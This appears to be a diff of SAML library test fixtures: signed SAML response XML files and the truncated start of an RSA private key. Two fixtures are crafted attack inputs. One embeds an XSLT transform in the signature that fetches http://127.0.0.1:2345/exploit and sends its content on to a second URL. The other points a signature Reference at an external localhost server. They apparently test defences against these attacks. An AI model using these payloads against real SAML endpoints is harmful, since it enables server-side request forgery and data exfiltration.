AeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status><saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="_6212b7e8c069d0f948c8648991d357addc4095a82f" Version="2.0" IssueInstant="2012-08-03T20:07:15Z"><saml:Issuer>http://phpsite/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
|
|
6
|
+
<ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
|
|
7
|
+
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
|
|
8
|
+
<ds:Reference URI="#_6212b7e8c069d0f948c8648991d357addc4095a82f"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>kaZN1+moS328pr2zn8SKUML1ElI=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>1kUEkG33ZGQMf/1H1gzqBOhT5N2I35vM04Jp67xVjnZXF54AqPq1ZaM+Wjgx++AjEbL7ksaYuM3JSyK7GlZ77VmzpLsMqn4eM00K7Y+CeZy5LB24vcngXPxBk6BdUYkVk0vOsUfAAZ+mRX/zzBW7Z4C7qbjNGhAAJgi13JoBWpU=</ds:SignatureValue>
|
|
9
|
+
<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml:Subject><saml:NameID SPNameQualifier="http://shard1.localdomain/saml2" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient">_3b3e7714b72e29dc4290321a075fa0b73333a4f25f</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="2012-08-03T20:12:15Z" Recipient="http://shard1.localdomain:3000/saml_consume" InResponseTo="d0016ec858d92360c597a01d155944f8df8fdb116d"/></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2012-08-03T20:06:45Z" NotOnOrAfter="2012-08-03T20:12:15Z"><saml:AudienceRestriction><saml:Audience>http://shard1.localdomain/saml2</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement AuthnInstant="2012-08-03T20:07:15Z" SessionNotOnOrAfter="2012-08-04T04:07:15Z" SessionIndex="_02f26af30a37afb92081f3a73728810193efd7fa6e"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement><saml:AttributeStatement><saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.1" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"><saml:AttributeValue xsi:type="xs:string">member</saml:AttributeValue></saml:Attribute><saml:Attribute Name="urn:oid:1.3.6.1.4.1.5923.1.1.1.6" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"><saml:AttributeValue xsi:type="xs:string">student@example.edu</saml:AttributeValue></saml:Attribute></saml:AttributeStatement></saml:Assertion></samlp:Response>
|
|
@@ -0,0 +1,57 @@
|
|
|
1
|
+
<?xml version="1.0"?>
|
|
2
|
+
<samlp:Response xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="Rbd1ca4d500b80130b5178ada0d47c52294f418ad" Version="2.0" IssueInstant="2014-06-03T12:43:56Z" Destination="">
|
|
3
|
+
<saml:Issuer>https://app.example.com/saml/</saml:Issuer>
|
|
4
|
+
<samlp:Status>
|
|
5
|
+
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
|
|
6
|
+
</samlp:Status>
|
|
7
|
+
<saml:Assertion xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" Version="2.0" ID="pfx9cb71b16-ad32-1735-fdcc-7a68b98ba9be" IssueInstant="2014-06-03T12:43:56Z">
|
|
8
|
+
<saml:Issuer>https://app.example.com/saml/</saml:Issuer>
|
|
9
|
+
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
|
|
10
|
+
<ds:SignedInfo>
|
|
11
|
+
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
|
|
12
|
+
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
|
|
13
|
+
<ds:Reference URI="#pfx9cb71b16-ad32-1735-fdcc-7a68b98ba9be">
|
|
14
|
+
<ds:Transforms>
|
|
15
|
+
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
|
|
16
|
+
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
|
|
17
|
+
<ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
|
|
18
|
+
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
|
19
|
+
<xsl:template match="/">
|
|
20
|
+
<xsl:variable name="exploit" select="document('http://127.0.0.1:2345/exploit')" />
|
|
21
|
+
<xsl:variable name="exploitUrl" select="concat('http://127.0.0.1:2345/here',substring($exploit, 1, 5))" />
|
|
22
|
+
<xsl:value-of select="document($exploitUrl)"/>
|
|
23
|
+
</xsl:template>
|
|
24
|
+
</xsl:stylesheet>
|
|
25
|
+
</ds:Transform>
|
|
26
|
+
</ds:Transforms>
|
|
27
|
+
<ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>
|
|
28
|
+
<ds:DigestValue>Q40aDbTJ0gA35qMt9bk6RLDaHM8=</ds:DigestValue>
|
|
29
|
+
</ds:Reference>
|
|
30
|
+
</ds:SignedInfo>
|
|
31
|
+
<ds:SignatureValue>evqiVwhRAqUlLxQrzmmKQ/TNVseqj4k0dO8CghneerLLW5mHqOPLQrAFyBgr8BK5
|
|
32
|
+
gqmnFnm8a6rjSuqMj8xCTVGq4jXwz38WXx8iYCP1pQJASzWPFq9HicHoGVo9UT7a
|
|
33
|
+
xyrTA51M+HswpueFnwE8anx0llBDNisxjZMX7ixdwc8=</ds:SignatureValue>
|
|
34
|
+
<ds:KeyInfo>
|
|
35
|
+
<ds:X509Data>
|
|
36
|
+
<ds:X509Certificate>MIIECDCCAvCgAwIBAgIUH1Nywt/+Cklv5RvuPPer8PNG7ggwDQYJKoZIhvcNAQEFBQAwUzELMAkGA1UEBhMCVVMxDDAKBgNVBAoMA3J1YjEVMBMGA1UECwwMT25lTG9naW4gSWRQMR8wHQYDVQQDDBZPbmVMb2dpbiBBY2NvdW50IDM1Mzc2MB4XDTEzMTEyNjE2MjgwN1oXDTE4MTEyNzE2MjgwN1owUzELMAkGA1UEBhMCVVMxDDAKBgNVBAoMA3J1YjEVMBMGA1UECwwMT25lTG9naW4gSWRQMR8wHQYDVQQDDBZPbmVMb2dpbiBBY2NvdW50IDM1Mzc2MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxINN52pg/eD9k4REEKq+1VQ+f7RxYVm0D2iTpJjFhBCi8jKhwMgQGqt/4x3iTx6i0swgi0xZIwMdsBlAB/83AFuXSK6hmZCY08zyM7x+wvj3EWwwC6fokvZvbb0PuIg7d4xgkMiSpDsCMg9XiDJytp8Obokmc0EPc0xEWdwIIwhPpy4TAdswcD5aTXnBn9fB/KRdmVR7VvnqCWqdTmOd3RxvvpcnLOHsycumGLVWukBNxHExALU6yTGMesJbg0fPhoN+MHxNYfe8NWBKFVEjdcvfVC9Ivemzj2xGDU1xMZ+v8uqt0pVV1LOmNcs5CvpMhZFSQFcu8dk77AAY2MJthQIDAQABo4HTMIHQMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFK2I7+srPutX2VzEnIwGmtCofTuhMIGQBgNVHSMEgYgwgYWAFK2I7+srPutX2VzEnIwGmtCofTuhoVekVTBTMQswCQYDVQQGEwJVUzEMMAoGA1UECgwDcnViMRUwEwYDVQQLDAxPbmVMb2dpbiBJZFAxHzAdBgNVBAMMFk9uZUxvZ2luIEFjY291bnQgMzUzNzaCFB9TcsLf/gpJb+Ub7jz3q/DzRu4IMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQUFAAOCAQEAnfgwE60ClcQ80b+GaFtEImzWlW7jIxpljSeRJ9Rbd6SSRxSck0Xwz17jtCnOaBeQ2igGyQfJA5R2OymaG9RqehGFdVEFbPC4OFwO1byUoGII9tReSKqtlemaEamgDLoYnnGVjFQ4/0EX4Ax2SjKNqwt+TgQykixfoo4GmCeFSSZnkoOEHUUWRDLqKK40AySnO8qA38g7fL+calsjqIcefy5Z5X1uybcFuif4IRvB6FpOMTPNj507cpCuqZw/sujVO+I00XD9VwuPT6TH9WerJp4Ye8J4HynADKsg6oJd61cqvQn33seNLIB/uA2U2uK/EY5c7m3I2VDgBDODbNZTng==</ds:X509Certificate>
|
|
37
|
+
</ds:X509Data>
|
|
38
|
+
</ds:KeyInfo>
|
|
39
|
+
</ds:Signature>
|
|
40
|
+
<saml:Subject>
|
|
41
|
+
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">user@example.com</saml:NameID>
|
|
42
|
+
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
|
|
43
|
+
<saml:SubjectConfirmationData NotOnOrAfter="2014-06-03T12:46:56Z" Recipient=""/>
|
|
44
|
+
</saml:SubjectConfirmation>
|
|
45
|
+
</saml:Subject>
|
|
46
|
+
<saml:Conditions NotBefore="2014-06-03T12:40:56Z" NotOnOrAfter="2014-06-03T12:46:56Z">
|
|
47
|
+
<saml:AudienceRestriction>
|
|
48
|
+
<saml:Audience/>
|
|
49
|
+
</saml:AudienceRestriction>
|
|
50
|
+
</saml:Conditions>
|
|
51
|
+
<saml:AuthnStatement AuthnInstant="2014-06-03T12:43:55Z" SessionNotOnOrAfter="2014-06-04T12:43:56Z" SessionIndex="_c01bb660-cd47-0131-de03-782bcb56fcaa">
|
|
52
|
+
<saml:AuthnContext>
|
|
53
|
+
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
|
|
54
|
+
</saml:AuthnContext>
|
|
55
|
+
</saml:AuthnStatement>
|
|
56
|
+
</saml:Assertion>
|
|
57
|
+
</samlp:Response>
|
|
@@ -0,0 +1,48 @@
|
|
|
1
|
+
<?xml version="1.0"?>
|
|
2
|
+
<samlp:Response xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="Rbd1ca4d500b80130b5178ada0d47c52294f418ad" Version="2.0" IssueInstant="2014-06-03T12:43:56Z" Destination="">
|
|
3
|
+
<saml:Issuer>https://app.example.com/saml/</saml:Issuer>
|
|
4
|
+
<samlp:Status>
|
|
5
|
+
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
|
|
6
|
+
</samlp:Status>
|
|
7
|
+
<saml:Assertion xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" Version="2.0" ID="pfx9cb71b16-ad32-1735-fdcc-7a68b98ba9be" IssueInstant="2014-06-03T12:43:56Z">
|
|
8
|
+
<saml:Issuer>https://app.example.com/saml/</saml:Issuer>
|
|
9
|
+
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
|
|
10
|
+
<ds:SignedInfo>
|
|
11
|
+
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
|
|
12
|
+
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
|
|
13
|
+
<ds:Reference URI="http://localhost:2345/myserverallday">
|
|
14
|
+
<ds:Transforms>
|
|
15
|
+
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
|
|
16
|
+
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
|
|
17
|
+
</ds:Transforms>
|
|
18
|
+
<ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>
|
|
19
|
+
<ds:DigestValue>Q40aDbTJ0gA35qMt9bk6RLDaHM8=</ds:DigestValue>
|
|
20
|
+
</ds:Reference>
|
|
21
|
+
</ds:SignedInfo>
|
|
22
|
+
<ds:SignatureValue>evqiVwhRAqUlLxQrzmmKQ/TNVseqj4k0dO8CghneerLLW5mHqOPLQrAFyBgr8BK5
|
|
23
|
+
gqmnFnm8a6rjSuqMj8xCTVGq4jXwz38WXx8iYCP1pQJASzWPFq9HicHoGVo9UT7a
|
|
24
|
+
xyrTA51M+HswpueFnwE8anx0llBDNisxjZMX7ixdwc8=</ds:SignatureValue>
|
|
25
|
+
<ds:KeyInfo>
|
|
26
|
+
<ds:X509Data>
|
|
27
|
+
<ds:X509Certificate>MIIECDCCAvCgAwIBAgIUH1Nywt/+Cklv5RvuPPer8PNG7ggwDQYJKoZIhvcNAQEFBQAwUzELMAkGA1UEBhMCVVMxDDAKBgNVBAoMA3J1YjEVMBMGA1UECwwMT25lTG9naW4gSWRQMR8wHQYDVQQDDBZPbmVMb2dpbiBBY2NvdW50IDM1Mzc2MB4XDTEzMTEyNjE2MjgwN1oXDTE4MTEyNzE2MjgwN1owUzELMAkGA1UEBhMCVVMxDDAKBgNVBAoMA3J1YjEVMBMGA1UECwwMT25lTG9naW4gSWRQMR8wHQYDVQQDDBZPbmVMb2dpbiBBY2NvdW50IDM1Mzc2MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxINN52pg/eD9k4REEKq+1VQ+f7RxYVm0D2iTpJjFhBCi8jKhwMgQGqt/4x3iTx6i0swgi0xZIwMdsBlAB/83AFuXSK6hmZCY08zyM7x+wvj3EWwwC6fokvZvbb0PuIg7d4xgkMiSpDsCMg9XiDJytp8Obokmc0EPc0xEWdwIIwhPpy4TAdswcD5aTXnBn9fB/KRdmVR7VvnqCWqdTmOd3RxvvpcnLOHsycumGLVWukBNxHExALU6yTGMesJbg0fPhoN+MHxNYfe8NWBKFVEjdcvfVC9Ivemzj2xGDU1xMZ+v8uqt0pVV1LOmNcs5CvpMhZFSQFcu8dk77AAY2MJthQIDAQABo4HTMIHQMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFK2I7+srPutX2VzEnIwGmtCofTuhMIGQBgNVHSMEgYgwgYWAFK2I7+srPutX2VzEnIwGmtCofTuhoVekVTBTMQswCQYDVQQGEwJVUzEMMAoGA1UECgwDcnViMRUwEwYDVQQLDAxPbmVMb2dpbiBJZFAxHzAdBgNVBAMMFk9uZUxvZ2luIEFjY291bnQgMzUzNzaCFB9TcsLf/gpJb+Ub7jz3q/DzRu4IMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQUFAAOCAQEAnfgwE60ClcQ80b+GaFtEImzWlW7jIxpljSeRJ9Rbd6SSRxSck0Xwz17jtCnOaBeQ2igGyQfJA5R2OymaG9RqehGFdVEFbPC4OFwO1byUoGII9tReSKqtlemaEamgDLoYnnGVjFQ4/0EX4Ax2SjKNqwt+TgQykixfoo4GmCeFSSZnkoOEHUUWRDLqKK40AySnO8qA38g7fL+calsjqIcefy5Z5X1uybcFuif4IRvB6FpOMTPNj507cpCuqZw/sujVO+I00XD9VwuPT6TH9WerJp4Ye8J4HynADKsg6oJd61cqvQn33seNLIB/uA2U2uK/EY5c7m3I2VDgBDODbNZTng==</ds:X509Certificate>
|
|
28
|
+
</ds:X509Data>
|
|
29
|
+
</ds:KeyInfo>
|
|
30
|
+
</ds:Signature>
|
|
31
|
+
<saml:Subject>
|
|
32
|
+
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">user@example.com</saml:NameID>
|
|
33
|
+
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
|
|
34
|
+
<saml:SubjectConfirmationData NotOnOrAfter="2014-06-03T12:46:56Z" Recipient=""/>
|
|
35
|
+
</saml:SubjectConfirmation>
|
|
36
|
+
</saml:Subject>
|
|
37
|
+
<saml:Conditions NotBefore="2014-06-03T12:40:56Z" NotOnOrAfter="2014-06-03T12:46:56Z">
|
|
38
|
+
<saml:AudienceRestriction>
|
|
39
|
+
<saml:Audience/>
|
|
40
|
+
</saml:AudienceRestriction>
|
|
41
|
+
</saml:Conditions>
|
|
42
|
+
<saml:AuthnStatement AuthnInstant="2014-06-03T12:43:55Z" SessionNotOnOrAfter="2014-06-04T12:43:56Z" SessionIndex="_c01bb660-cd47-0131-de03-782bcb56fcaa">
|
|
43
|
+
<saml:AuthnContext>
|
|
44
|
+
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
|
|
45
|
+
</saml:AuthnContext>
|
|
46
|
+
</saml:AuthnStatement>
|
|
47
|
+
</saml:Assertion>
|
|
48
|
+
</samlp:Response>
|
|
@@ -0,0 +1,9 @@
|
|
|
1
|
+
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_641f919c529eb4b9c2c6447d577483256d45ac9c43" Version="2.0" IssueInstant="2014-09-16T22:15:53Z" Destination="http://shard-2.canvas.dev/saml_consume" InResponseTo="ffb009599eec994f0a4cbadbff1628f90695e44d22"><saml:Issuer>http://simplesamlphp.dev/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
|
|
2
|
+
<ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
|
|
3
|
+
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
|
|
4
|
+
<ds:Reference URI="#_641f919c529eb4b9c2c6447d577483256d45ac9c43"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>JjgISND0GviF1NMyrGHvCAAjQTE=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>sHnaxEHN/COmtv0AzcnLV5GT2iOp9jtIo3cLeyO/ByzytLlWr5T7SKUK9pl3vs1faLiFm/S5r62srB/nf7AWFG0VRGi2QXb/gqu9A0Bm1PnqTRAtHHxH1E8oVKadiNTP1GXtmYphCgnM3ZCW6g7wUt/uS8+7sU9Q1TOTAVPzNso=</ds:SignatureValue>
|
|
5
|
+
<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status><saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="_3213cbee5db3b66a763035443e746877d161f0a7a5" Version="2.0" IssueInstant="2014-09-16T22:15:53Z"><saml:Issuer>http://simplesamlphp.dev/simplesaml/saml2/idp/metadata.php</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
|
|
6
|
+
<ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
|
|
7
|
+
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
|
|
8
|
+
<ds:Reference URI="#_3213cbee5db3b66a763035443e746877d161f0a7a5"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>fVMHYHwOvYPwyftkUgdYe0MREmM=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>hVs09lhchv3LKLa/JHNUkDB8Ze7p8g+HFoZmim2vZzvO0DX6SBT9dYDyJgHSwpyfNUr5Ba70/4Sw9/uGFBjhCqe1oQ5VqbmZW34ugvvXShzcnt6v/8S4e2tgOpnUS3XfQwYLt8Rq4k1D9fr3SdWws5UGbt5pSYGGyYgY+1AB9ow=</ds:SignatureValue>
|
|
9
|
+
<ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICgTCCAeoCCQCbOlrWDdX7FTANBgkqhkiG9w0BAQUFADCBhDELMAkGA1UEBhMCTk8xGDAWBgNVBAgTD0FuZHJlYXMgU29sYmVyZzEMMAoGA1UEBxMDRm9vMRAwDgYDVQQKEwdVTklORVRUMRgwFgYDVQQDEw9mZWlkZS5lcmxhbmcubm8xITAfBgkqhkiG9w0BCQEWEmFuZHJlYXNAdW5pbmV0dC5ubzAeFw0wNzA2MTUxMjAxMzVaFw0wNzA4MTQxMjAxMzVaMIGEMQswCQYDVQQGEwJOTzEYMBYGA1UECBMPQW5kcmVhcyBTb2xiZXJnMQwwCgYDVQQHEwNGb28xEDAOBgNVBAoTB1VOSU5FVFQxGDAWBgNVBAMTD2ZlaWRlLmVybGFuZy5ubzEhMB8GCSqGSIb3DQEJARYSYW5kcmVhc0B1bmluZXR0Lm5vMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9IbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+PbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQABMA0GCSqGSIb3DQEBBQUAA4GBACDVfp86HObqY+e8BUoWQ9+VMQx1ASDohBjwOsg2WykUqRXF+dLfcUH9dWR63CtZIKFDbStNomPnQz7nbK+onygwBspVEbnHuUihZq3ZUdmumQqCw4Uvs/1Uvq3orOo/WJVhTyvLgFVK2QarQ4/67OZfHd7R+POBXhophSMv1ZOo</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml:Subject><saml:NameID SPNameQualifier="http://shard-2.canvas.dev/saml2" Format="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">testuser@example.com</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="2014-09-16T22:20:53Z" Recipient="http://shard-2.canvas.dev/saml_consume" InResponseTo="ffb009599eec994f0a4cbadbff1628f90695e44d22"/></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2014-09-16T22:15:23Z" NotOnOrAfter="2014-09-16T22:20:53Z"><saml:AudienceRestriction><saml:Audience>http://shard-2.canvas.dev/saml2</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement AuthnInstant="2014-09-16T22:15:53Z" SessionNotOnOrAfter="2014-09-17T06:15:53Z" SessionIndex="_9f28445329a5ada29cca3cfae83a08d289d0816bc0"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement><saml:AttributeStatement><saml:Attribute Name="uid" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">testuser@example.com</saml:AttributeValue></saml:Attribute><saml:Attribute Name="email" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">testuser@example.com</saml:AttributeValue></saml:Attribute><saml:Attribute Name="eduPersonAffiliation" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">member</saml:AttributeValue></saml:Attribute><saml:Attribute Name="givenName" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">Canvas</saml:AttributeValue></saml:Attribute><saml:Attribute Name="displayName" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">Canvas Üser</saml:AttributeValue></saml:Attribute><saml:Attribute Name="surname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic"><saml:AttributeValue xsi:type="xs:string">Üser</saml:AttributeValue></saml:Attribute></saml:AttributeStatement></saml:Assertion></samlp:Response>
|
|
@@ -0,0 +1,15 @@
|
|
|
1
|
+
-----BEGIN RSA PRIVATE KEY-----
|
|
2
|
+
MIICXQIBAAKBgQAAAAAAAAUARD2GBLow5+W1EW5LFgI2o4N0fAgJEFV6KPbEokdW
|
|
3
|
+
rzHlLmfaxdDyIK+QilQqdtg3hU96zIFp8Dk9xnxJNYo1iIzZllrA+q95Dwf5sDTi
|
|
4
|
+
oD3IHF2GL0CO1BhA6FX1d3ZuAaIwCI7G4Dw1PjBaUzHr99S9iwBJtHvD6QIDAQAB
|
|
5
|
+
AoGBAIRISICh6o5yaCRn9T++lhkRsrmC40gqDW1E3rRgJoE91MSXO1hYI8/fFp81
|
|
6
|
+
o8fpUNHQnCqDSAZ0xuB40cLbNTQzLS/z43Jf/LRVEF6EhAspv0iiN+M4NjWZKGaV
|
|
7
